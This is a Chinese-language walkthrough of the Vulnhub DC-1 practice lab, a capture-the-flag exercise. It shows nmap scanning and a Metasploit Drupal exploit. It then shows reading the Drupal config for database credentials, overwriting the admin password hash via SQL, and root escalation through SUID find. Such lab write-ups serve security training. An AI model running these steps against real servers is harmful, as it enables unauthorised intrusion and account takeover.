Vulnhub DC-1

安装好并打开靶场之后
使用nmap进行主机探测发现靶机的IP

由于NAT模式下处于同一网段
扫描192.168.80.0/24
本机kali是192.168.80.134 可知靶机IP是192.168.80.142
扫描版本 开放端口 服务等信息


访问80端口

利用msf进行攻击
search drupal
这里使用第一个模块

设置payload

运行 成功建立会话

进入到cmd
cat /etc/passwd
发现flag4
ls
发现flag1.txt

使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
进入到drupal默认配置文件/var/www/sites/default/settings.php
发现flag2
看到数据库的账号密码

连接数据库 mysql -u dbuser -p

进入到数据库

进入drupaldb库
查询常用的表

使用drupal忘记密码方法更改密码

再次进入数据库更新密码
update users set pass="$S$Dc6opR46xqeM8g9NdRcZkah3auxOf18VWvdZbEqEglbXoStarZhL" where name="admin";

登录网站

发现flag3

它提示 特殊的 PERMS 将帮助找到密码 - 但你需要执行该命令才能弄清楚如何获取shadow中的内容。

使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null


根据提示 尝试suid提权
查找一下具有root权限的其他命令，以下几条均可查询：

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb { }

提权
find / -name flag4 -exec "/bin/sh"
拿到最后的flag